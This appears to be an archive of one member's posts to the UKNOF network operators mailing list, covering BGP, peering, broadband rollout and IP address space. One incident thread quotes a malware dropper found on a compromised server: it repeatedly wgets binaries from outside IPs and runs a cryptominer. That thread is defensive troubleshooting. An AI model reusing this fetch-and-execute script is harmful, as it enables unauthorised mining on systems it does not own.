> Please don't use that guide as the basis for any BGP speaking router in the
> 21st Century :)

Patches welcome.

--
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from
hkp://pool.subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] BGP configuration best practices from ANSSI and others

[Gavin Henry]

Hi all,

This is really very good (in case anyone missed it):

http://www.ssi.gouv.fr/uploads/2013/10/BGP_configuration_best_practices.pdf

for (as per listed in PDF):

SR-OS (Alcatel-Lucent)
IOS (Cisco)
Junos (Juniper)
OpenBGPD (OpenBSD)

Covers:

Interconnection 1: bilateral peering in an Internet exchange point
Interconnection 2: peering using a route server in an exchange point
Interconnection 3: private peering between two ASes in a Network
Access Point, or interconnection in a telecommunications room
Interconnection 4: session established in multihop

with relationships:

Relationship 1: transit / stub customer
Relationship 2: transit AS / small transit AS
Relationship 3: peering

I'm sure it's old new, but very handy to save.

Thanks.


-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from
hkp://pool.subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] More Telecity woes?

[Gavin Henry]

Hi all,

What's the latest?

Thanks.

-- 
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 1224 279484
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/

Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie, Aberdeenshire, AB51 8GL.

Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html

Do you know we have our own VoIP provider called SureVoIP? See
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] Notice of Claimed Infringement

[Gavin Henry]

>
> Machine readable, even. Here is a pseudonymised example:
>
> 
> <

Yep, this is the exact one.

Re: [uknof] Notice of Claimed Infringement

[Gavin Henry]

> After a little more analysis we became sure it was mostly due to one
> source. We quickly tracked the offender down to someone in network ops
> who was running a torrent client without setting bandwidth limits! A
> quiet word was had. Complaints about network speed stopped.
>

Nice one!

Re: [uknof] Notice of Claimed Infringement

[Gavin Henry]

> Get in touch with your customer, ask them to stop it, and get back to
> Paramount and inform them of the same.

Thanks. That's the least we'll do. Their business connection could
have been compromised and they're unaware. We'll see.

Re: [uknof] Notice of Claimed Infringement

[Gavin Henry]

Thanks Brendan and all.

--
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 1224 279484
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/

Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie,
Aberdeenshire, AB51 8GL.

Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html

Do you know we have our own VoIP provider called SureVoIP®? See
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] FTTC roll out logic?

[Gavin Henry]

On 4 Jun 2015 11:16, boggits bogg...@gmail.com wrote:

 On 4 June 2015 at 11:00, Gavin Henry ghe...@suretec.co.uk wrote:
  How does this selection process for
  upgrading exchanges get decided?!?

 Some have posited the following

 1. Money - upgrade locations where there is business case in terms of
 density of end users with available cash to spend
 2. Market Protection - Upgrade where VM have coverage, where other 3rd
 parties are deploying their solution and at the same time don't
 upgrade business areas (unless you have to) to stop Ethernet losses
 3. Politics - because either someone is paying you to do the work or
 its the only way to shut someone up


But isn't it Openreach doing these? Are the rollout plans given to Ofcom
and justified to Ofcom?

That's their job to oversee this. When will the minimum legal of 2mb/s
access get increased?

Re: [uknof] FTTC roll out logic?

[Gavin Henry]

 A big office might be on an exchange only line without a PCP (Primary
 Connection Point / green cabinet) to put an FTTC cabinet next to.

 BT Openreach claim to be working on a solution for EO lines. I'm not sure
 what it will be or when it might happen.

Ah, that makes more sense now. Thanks.

-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] FTTC roll out logic?

[Gavin Henry]

On 4 June 2015 at 11:28, Neil J. McRae n...@domino.org wrote:
 The NGA roll out is focused on the consumer market and return. I suspect
 your location would have been delivered under one of the rural extension
 schemes which I think would be HIE in your area. See my slides at -2
 Uknofs for the wider build picture in Scotland.

Thanks Neil. Yes, they were very interesting!

-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] Sanity check: Houston/US PoP

[Gavin Henry]

Hi all,

We're thinking about expanding our network to Houston as all of our
Aberdeen based Oil and Gas customers have an office there and they are
asking about options.

This will obviously allow US originated hosted VoIP traffic to stay there
and other benefits.

Correct me if I've completely got this wrong but this would mean:

* colo or our own rack space there
* our normal routing, switching and server kit
* address space to announce from ARIN via transit (so we can offer public
services there too)
* obviously backhaul to our THE PoP, which we can then dish traffic out to
our other PoP's
* Peering (which I understand not to be as easy and open as here?)
* US SIP carrier or TDM interconnect for breakout (we could use Level3 for
some of that as we use them here for transit)

Who do you recommend working with in Houston for this as I'm certain others
have this already on the list?

What blindly obvious thing have I forgotten at this time of night?

Thanks (AS199659)

--
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http http://www.suretecgroup.com/0x8CFBA8E6.gpg://
http://www.suretecgroup.com/0x8CFBA8E6.gpgwww.suretecgroup.com
http://www.suretecgroup.com/0x8CFBA8E6.gpg/0x8CFBA8E6.
http://www.suretecgroup.com/0x8CFBA8E6.gpggpg
http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] The operator's operator

[Gavin Henry]

 Bogons can do all of the above :)

 The problem with FTTC from a small provider (like us) is that the per-Mbps
 we get charged by the wholesalers means we can't offer unlimited usage like
 the big players can (who depend on 75% of their users barely using it at all).

 As long as you're not taking the p*ss, we're reasonably tolerant.

We're the same. We use TTB LLU's for unlimited products (fixed cost
across the TTB network from the CPE to our NNI's) and BTW for the FTTC
stuff (but only for busienss traffic). Although looking at TTB EoFTTC
products too.

We go through an aggregator for this. On BT WBC do you get charged
95th for traffic from the CPE to your NNI or do you pay for a big
pipe? Using our BTW account I've downloaded their WBC and WBMC price
lists and I've never seen anything like it! The xls is mental. Nothing
like the SIP one.

-- 
Kind Regards,
Gavin Henry.

http://www.surevoip.co.uk

Re: [uknof] The operator's operator

[Gavin Henry]

On 23 March 2015 at 20:25, Rod Beck rod.b...@hibernianetworks.com wrote:
 Watch the feeding frenzy and I thought 10 gig waves were competitive.  I will 
 stick to my niche. :)

My email wasn't an offer, just a question :-)

[uknof] BT Calypso 999 Emergency File Format (EFF 999) and Openreach EMP XML API Open source libs

[Gavin Henry]

Evening all,

As far as I can tell I've not seen anything open source for this. We
have had permission to put our implementation out that we use. It will
go on the CPAN sometime this month and github (Text::EFF999). We're
about to start the same for Openreach EMP integration. Not sure if
we'll be allowed to open source any code yet (or a suitable license).
Conf call with Openreach tomorrow morning re discussion around service
establishment for EAD, LLU and WLR3. Therefore, our work will only
involve those three products but at least the framework will be there
once. If we come across anything during our SS7 interconnect work
we'll do the same.

We're great believers in open source (as it powers all of our services
and we contribute where we can) and wanted to know if other
network/telco devs/devops etc. would be willing to look over this code
and contribute, when ready, via github and/or similar?

No dates yet. I just hate the fact that the 999 stuff is getting done
again and again by us all and the few Openreach XML API consumers out
there controlling who you have to go to if you want to use a web gui.

Thanks,

Gavin.

Disclaimer: Since we've not had our first call with Openreach yet, I
may have got this all wrong and it may not happen.

-- 
http://www.surevoip.co.uk

Re: [uknof] Smartoptics still around?

[Gavin Henry]

Thanks. I actually had FlexOptix in my basic too.

--
Kind Regards,

Gavin Henry.
 On 20 Dec 2014 21:17, Joseph Waite joeli...@hannontelecom.net wrote:

 I'm just getting page won't load. I don't use them as I find
 http://www.solid-optics.com/ cheaper. There based in Netherlands but ship
 next day and I'm pretty sure they don't charge postage. They also now offer
 a re-coding box to re-code their optics.

 Regards

 Joe Waite

 On 20 Dec 2014, at 20:49, Gavin Henry ghe...@suretec.co.uk wrote:

 Anyone else's getting this 508?

 --
 Kind Regards,

 Gavin Henry.

 Screenshot_2014-12-20-20-29-41.png

Re: [uknof] Smartoptics still around?

[Gavin Henry]

On 20 Dec 2014 21:38, Fearghas McKay fearg...@gmail.com wrote:


  On 20 Dec 2014, at 21:17, Joseph Waite joeli...@hannontelecom.net
wrote:
 
  I'm just getting page won't load. I don't use them as I find
http://www.solid-optics.com/ cheaper. There based in Netherlands but ship
next day and I'm pretty sure they don't charge postage. They also now offer
a re-coding box to re-code their optics.

 Their box only does SFP/+ and XFP, no QSFP.

I've already ordered FlexOptix, but it seems our vendors supplier only
supports  SmartOptics.

BTW, is V3 new as we have a re-enconder unit already from you.

--
Kind Regards,
Gavin Henry.

Re: [uknof] Edinburgh leased lines

[Gavin Henry]

Hi Martin,

Take a look at https://www.connectionvouchers.co.uk/ to cover any
install costs. Edinburgh is covered.

Thanks.

Re: [uknof] High Density Wifi

[Gavin Henry]

I wonder what these guys are using? Not as high density as what you
want to do I'm sure. Just announced in our home city:

http://www.publiccontractsscotland.gov.uk/search/show/Search_View.aspx?id=DEC194619
by http://www.pinaclsolutions.com/aberdeen-wifi

Free public WiFi will soon be available across 24 publicly accessible
council properties in Aberdeen, as part of the latest work to be
delivered by the Accelerate Aberdeen programme. 

Gavin.

Re: [uknof] High Density Wifi

[Gavin Henry]

On 10 December 2014 at 20:40, Rod Beck rod.b...@hibernianetworks.com wrote:
 Does anyone think that free WIFI in public places actually builds the 
 Digital Economy? I tend to think this is just feel good politics. I travel, 
 and yes, it is useful to have free access. But ...

It's certainly free to the public but the public have paid for it.
Just look at the contract value on that link.

-- 
Kind Regards,
Gavin Henry.

[uknof] Link from THE to THN?

[Gavin Henry]

Evening all,

Can anyone offer me a link from TFM61 in THE across to BT's NAP in THN?

Thanks.

-- 
Kind Regards,
Gavin Henry.

Re: [uknof] Loopholes, Ethics and Business Acumen with Ofcom and RIPE

[Gavin Henry]

On 20 October 2014 09:03, Adrian Kennard uk...@e.gg wrote:
 On 05/09/14 11:47, Gavin Henry wrote:
 2. Ofcom - with the newish charges per number range per year, for area
 codes that are classified as scarce, at £0.50 you get a £0.20~
 discount on numbers ported out to another company. Upon a customer
 sign up for a telephone number in a scarce area, immediately port it
 to another Ltd company you own and receive your £0.20 per number per
 year discount.

 We are doing this - separate company handles the ported numbers and
 wholesales them back to us. So far OFCOM have accepted the discount
 claim, but failed actually get the bills right.

 Once the billing is all sorted, we will be in a position of wanting to
 encourage more number take up in conservation areas, as we only get the
 discount on ported numbers and only actual in-use numbers can be ported.

 This commercial incentive to us is the exact opposite of OFCOMs intentions.

Thanks Adrian. Yeah, seems nothing wrong with 1 or 2 I've mentioned then.

Gavin.

-- 
Kind Regards,
Gavin Henry.

Re: [uknof] UK IPv6 Taskforce

[Gavin Henry]

 Now, only one of these groups is really feeling the pain of address
 depletion, and that's the access ISPs(2). Some feel that pain badly, and
 it's certainly true that there's no way you could enter the market as an
 access ISP in the UK given a /22 of address space.

You can if you're selling access to your own services and you're dual
stack. This allows you to run the CPE side in IPv6 only, but then
you're possibly a content provider selling access to your own
content?? :-)

-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] UK IPv6 Taskforce

[Gavin Henry]

On 5 September 2014 07:51, Neil J. McRae n...@domino.org wrote:
 Hmm! Unfortunately that sounds like a made up imaginary world though! :)  Or 
 is someone actually doing this (and have more than 75k customers were the /23 
 would give challenges)?

We're doing it, but don't have 75k customers :-(

-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] UK IPv6 Taskforce

[Gavin Henry]

On 5 September 2014 08:31, Neil J. McRae n...@domino.org wrote:
 On 05/09/2014 08:15, Gavin Henry ghe...@suretec.co.uk wrote:

On 5 September 2014 07:51, Neil J. McRae n...@domino.org wrote:
 Hmm! Unfortunately that sounds like a made up imaginary world though!
:)  Or is someone actually doing this (and have more than 75k customers
were the /23 would give challenges)?

We're doing it, but don't have 75k customers :-(

 So no Internet access at all, just to your own content?

That's right, but just for VoIP Only access. The content being a SIP
or Video call on Hosted VoIP/DDI etc. It means we can actually keep a
VoIP only access circuit really low priced. There is more to do for
clever folks using IPv6 to IPv4 tunnels etc. but it's a good start
rather than going out and paying ~£10 ex VAT per IP address on a /22
above the /22 you get as an LIR (buying a failing ISP may be cheaper
for  /22 at the moment). But saying that, there are still plenty IPv4
out there to buy if we need to which wouldn't take more than 1-2
months billing to make a return.

Gavin.

-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] UK IPv6 Taskforce

[Gavin Henry]

 /22 ?

 http://www.ripe.net/ripe/policies/proposals/2014-01

Sorry, when we got our LIR status that is. Even tougher now. Either
need to buy them or buy someone.

-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] Loopholes, Ethics and Business Acumen with Ofcom and RIPE

[Gavin Henry]

Hi all,

Thinking about this, as I know it's being done but wanted others
opinions on it and wondered what RIPE and Ofcom are doing about it or
if they care:

1. RIPE - start a new Ltd company, pay your 2000 Euros to RIPE and get
a /22 with no ASN. Transfer that back to your existing company for
free. Saves paying £10~ per IPv4 address for a /22 on the open market.
Or do this and add to your IP brokerage company so you can sell them.
Various issues but folks are doing it.
2. Ofcom - with the newish charges per number range per year, for area
codes that are classified as scarce, at £0.50 you get a £0.20~
discount on numbers ported out to another company. Upon a customer
sign up for a telephone number in a scarce area, immediately port it
to another Ltd company you own and receive your £0.20 per number per
year discount.

Thoughts? For me it's one of those things that should be very easily
spotted and stopped, but does the blame lay with the schemes in
general?

Thanks,

Gavin.

-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] Loopholes, Ethics and Business Acumen with Ofcom and RIPE

[Gavin Henry]

On 5 September 2014 11:50, Neil J. McRae n...@domino.org wrote:

 On 05/09/2014 11:47, Gavin Henry ghe...@suretec.co.uk wrote:

Thoughts? For me it's one of those things that should be very easily
spotted and stopped, but does the blame lay with the schemes in
general?

 You can¹t please all of the people all of the time.

Yep, that's where I got to. Didn't want to come across ranty.

-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] Automatic / Zero Touch Device Configuration

[Gavin Henry]

You need your own API James :)

--
Kind Regards,

Gavin Henry.

Re: [uknof] Wanted: BT TDM Interconnect SS7 Switch

[Gavin Henry]

Hi Joe,

This is legit as we (SureVoIP) were looking too:

http://uk.businessesforsale.com/uk/UK-SS7-Telecoms-Interconnect-Business-For-Sale.aspx

Thanks.

Re: [uknof] DNS global issue?

[Gavin Henry]

BT IP Exchange is down due to this too.

Can't get through to IPX help desk since 09:20. They do have a message on
there saying something is up.

Re: [uknof] DNS global issue?

[Gavin Henry]

Alerting has detected it's back.

Re: [uknof] Thus box - fibre?

[Gavin Henry]

Thanks all. Will let you know how I get on. The only thing on the
front is a small lable that looks too short to be a unique ID. I'll
got back in the morning and trace into the loft.

Gavin.

[uknof] decrypting Junos authentication-keys

[Gavin Henry]

Hi all,

Just a quick one if you misplace the password you've used for an
authentication key, if you use:

http://securityxploded.com/juniper-password-decryptor.php

and paste your $9 prefixed hash, it instantly shows your password. One
we forgot to document was revealed like this.

That tool comes with a virus (wajam_validate.exe installer) so run via
wine on Linux/Mac as it fails to install, or on a throw away VM.

Thanks.

-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

Re: [uknof] 3rd party remote hands in Telehouse

[Gavin Henry]

What's up with Telehouse remote hands? Never and an issue with quality of
work. Cost?

Gavin.

Re: [uknof] 3rd party remote hands in Telehouse

[Gavin Henry]

 Actually, quality of work is poor - if done in tandem with their cabling,

We've had problems with cables runs and fibre having it's cladding
bursting out once.

 they produce a rats nest and subsequently knock cables out when working in a
 busy rack or bend fibre beyond their bend radius limit. A big chunk of this
 is they don't know how to manage structured cabling. Prior to their policy
 changed we used 3rd parties for all the works and they maintained nicely
 groomed cable trays and ran patching neatly.

Not had to do too much of this as yet.

 If I was regularly needing work carrying out on a non emergency basis I
 would outsource. The contractors I used to use have got other jobs now so I
 don't know who to suggest but this list ought to have some ideas...

It's pretty disappointing if this is true and not raised with them to
rectify given the prices paid.

-- 
Kind Regards,
Gavin Henry.

Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel

[Gavin Henry]

On 21 Apr 2014 10:30, Paul Mansfield paul+uk...@mansfield.co.uk wrote:

 I'd still use the security setting if possible even if you think it's
unnecessary... to avoid fat finger breakage.

Yep,  makes sense.

Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel

[Gavin Henry]

Hi Tom,

Yeah, see this:

http://www.opsview.com/forum/opsview-core/bug-reports/nrpe-215-vulnerability

and this from a reply to the abuse email of the IP address range used:

http://krebsonsecurity.com/2013/07/botcoin-bitcoin-mining-by-botnet/

Thanks.

On 21 April 2014 16:04, Tom Storey t...@snnap.net wrote:
 Probably also worth making /tmp noexec so that stuff like this has a
 harder time getting started.

 On 20 April 2014 20:14, Gary Steers g...@boosty.com wrote:
 All,

 This looks like its some form of crypto currency miner xptMiner.exe, think
 that ones a RieCoin one...

 Undoubtedly the servers in use are compromised in some way but may be worth
 an abuse message to the contact on the RIR record in whois?

 Gavin, have sent you an e-mail off topic as well with a little more info,
 hope it was useful.

 ---
 Gary Steers
 Chief Network Engineer | Boosty


 On 20 April 2014 19:56, Gavin Henry ghe...@suretec.co.uk wrote:

 Hi all,

 Not usually a post you see on uknof, but wanted some help and to check
 if anyone else has seen this?

 We've just started getting alerts from one of our servers for highload
 and discovered a weird process:

 nagios285936  0.0  0.0  10744  1468 ?S19:03   0:00
 bash /tmp/toplel
 nagios292199  102  0.5 3261868 362816 ?  Rl   19:39   0:15  \_
 /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s
 2965706752


 root@hostname:/tmp# ls -lh
 total 1016K
 -rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 l
 -rwxrwxrwx 1 nagios nagios   615 Apr 20 19:05 toplel
 -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t


 No idea where it came from. All our stuff has OpenSSL updated as is
 our Nagios. w00t is a binary, toplel is a bash script containing:

 #!/bin/bash
 if [ $1 -le 10 ] ; then
 NUM = $(expr $1 + 1)
 nohup bash $0 $NUM /dev/null 21 
 exit
 fi
 CORECOUNT=$(cat /proc/cpuinfo | grep -c processor)
 FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}')
 FREE=$(expr $FREE - 52428800)
 FREE=$(expr $FREE / $CORECOUNT)

 while true; do
 killall w00t
 wget http://162.213.24.40/nope-sse4 -O /tmp/w00t
 chmod 777 /tmp/w00t
 /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s
 $FREE

 wget http://162.213.24.40/nope-nse4 -O /tmp/w00t
 chmod 777 /tmp/w00t
 /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s
 $FREE

 sleep 300
 done;



 --
 Kind Regards,
 Gavin Henry.





-- 
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 1224 279484
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/

Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie,
Aberdeenshire, AB51 8GL.

Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html

Do you know we have our own VoIP provider called SureVoIP? See
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel

[Gavin Henry]

Hi all,

Not usually a post you see on uknof, but wanted some help and to check
if anyone else has seen this?

We've just started getting alerts from one of our servers for highload
and discovered a weird process:

nagios285936  0.0  0.0  10744  1468 ?S19:03   0:00
bash /tmp/toplel
nagios292199  102  0.5 3261868 362816 ?  Rl   19:39   0:15  \_
/tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s
2965706752


root@hostname:/tmp# ls -lh
total 1016K
-rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 l
-rwxrwxrwx 1 nagios nagios   615 Apr 20 19:05 toplel
-rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t


No idea where it came from. All our stuff has OpenSSL updated as is
our Nagios. w00t is a binary, toplel is a bash script containing:

#!/bin/bash
if [ $1 -le 10 ] ; then
NUM = $(expr $1 + 1)
nohup bash $0 $NUM /dev/null 21 
exit
fi
CORECOUNT=$(cat /proc/cpuinfo | grep -c processor)
FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}')
FREE=$(expr $FREE - 52428800)
FREE=$(expr $FREE / $CORECOUNT)

while true; do
killall w00t
wget http://162.213.24.40/nope-sse4 -O /tmp/w00t
chmod 777 /tmp/w00t
/tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE

wget http://162.213.24.40/nope-nse4 -O /tmp/w00t
chmod 777 /tmp/w00t
/tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE

sleep 300
done;



-- 
Kind Regards,
Gavin Henry.

Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel

[Gavin Henry]

 Not seen it but have seen variants reported - that's a coin miner of
 some sort (-u username -p password - the fact it's looking for RAM
 available etc suggests probably Scrypt-based). The IP it's targeting
 is a pool called YPool. Might be worth reporting this to the pool
 and/or the host of the file (company called VolumeDrive apparently).

Thanks. I've discovered this now.

 Are you running any Nagios extensions that run as servers? Are you
 using nrpe/is it locked down in your firewall to only accept your
 Nagios host?

All locked down, but checking. We use Opsview Pro so are raising a
ticket with them too as there are
no opsview-agent/nrpe updates that we haven't applied.

Gavin.

-- 
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 1224 279484
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/

Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie,
Aberdeenshire, AB51 8GL.

Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html

Do you know we have our own VoIP provider called SureVoIP? See
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel

[Gavin Henry]

Hi Paul,

Yep, just seen and issue was a badly configured iptables on this VM
leaving port 5666 open to the world with accept args on in nrpe.cfg
for Opsview-agent (their stock one).

So usual human error.

Cheers all!

On 20 April 2014 21:14, Paul Mansfield p...@mansfield.co.uk wrote:
 looks like you've been hit by the nagios nrpe vulnerability:
 http://seclists.org/fulldisclosure/2014/Apr/240

 basically it's possible to feed NRPE with additional commands because
 NRPE doesn't block newlines when it cleans up input.



-- 
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 1224 279484
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/

Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie,
Aberdeenshire, AB51 8GL.

Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html

Do you know we have our own VoIP provider called SureVoIP? See
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] Very weird server process, hacked? /tmp/w00t /tmp/lllll /tmp/toplel

[Gavin Henry]

 So usual human error.

 ah, oh dear :-(

 sadly you're probably far from the only one.

 does allowed_hosts in nrpe.cfg not stop the vulnerability?


Hi Paul,

Probably, but it's normally firewalled off and not run that way.

Thanks.

Re: [uknof] Possible Prefix Hijack - BGPmon alert - what to do?

[Gavin Henry]

Thanks all. Thought I'd check with those who know more than me :-)

Gav.

-- 
Kind Regards,
Gavin Henry.

Re: [uknof] Offsite storage

[Gavin Henry]

Hi all,

Thanks for all the offlist replies. To clarify, it's 1Tb I'm looking
for with the data saved outside Telehouse, as that's where we are.

Gavin.

On 31 January 2014 10:30, Gavin Henry ghe...@suretec.co.uk wrote:
 Hi all,

 Can anyone offer us some offsite storage that we can dump to via SSH/rsync?
 Preferably across LONAP.

 Thanks.

 Gavin





-- 
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 1224 279484
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/

Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie,
Aberdeenshire, AB51 8GL.

Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html

Do you know we have our own VoIP provider called SureVoIP? See
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] Offsite storage

[Gavin Henry]

Hi all,

Can anyone offer us some offsite storage that we can dump to via SSH/rsync?
Preferably across LONAP.

Thanks.

Gavin

[uknof] Drop shipping CPE routers

[Gavin Henry]

Hi all,

Any recommendations for companies that drop ship CPE routers pre-configured?

Thanks.

-- 
Kind Regards,

Gavin Henry.

Re: [uknof] Preferred legal firm

[Gavin Henry]

Hi Steve,

We use Brodies for our Ofcom ones:

http://www.surevoip.co.uk/about/terms-conditions

They have a department for this. Not too pricey.

Thanks.

-- 
Kind Regards,

Gavin Henry.

Re: [uknof] Drop shipping CPE routers

[Gavin Henry]

Thanks all! On the phone now with Netlynk.

Gavin.

On 20 January 2014 16:20, Matthew Hattersley
matthew.hatters...@vaioni.com wrote:
 You might want a chat with http://www.netlynkdirect.com/.



 We’ve used them before, pretty good automation too.



 YMMV



 From: uknof [mailto:uknof-boun...@lists.uknof.org.uk] On Behalf Of Dave
 Wilson
 Sent: 20 January 2014 16:17
 To: uknof@lists.uknof.org.uk
 Subject: Re: [uknof] Drop shipping CPE routers



 On 20 January 2014 11:42, Gavin Henry ghe...@suretec.co.uk wrote:

 Hi all,

 Any recommendations for companies that drop ship CPE routers pre-configured?



 I would also be interested in this.



 DW

 The information transmitted in and with this email is intended only for the
 person or entity to which it is addressed and may contain confidential
 and/or privileged material. Statements and opinions expressed in this e-mail
 may not represent those of the Company. Any review, retransmission,
 dissemination or other use of, or taking of any action in reliance upon,
 this information by persons or entities other than the intended recipient is
 prohibited. If you received this in error, please contact the sender
 immediately and delete the material from any computer. Please also note,
 Vaioni filter incoming email for spam and inappropriate words. Unfortunately
 this does mean that sometimes genuine messages can be filtered out. Although
 we take measures to recover such messages, it must not be assumed that an
 email has been received by us and important communications should always be
 followed up by a phone call, fax or printed copy.



-- 
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 1224 279484
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/

Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie,
Aberdeenshire, AB51 8GL.

Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html

Do you know we have our own VoIP provider called SureVoIP? See
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] External monitoring of routes in to your network

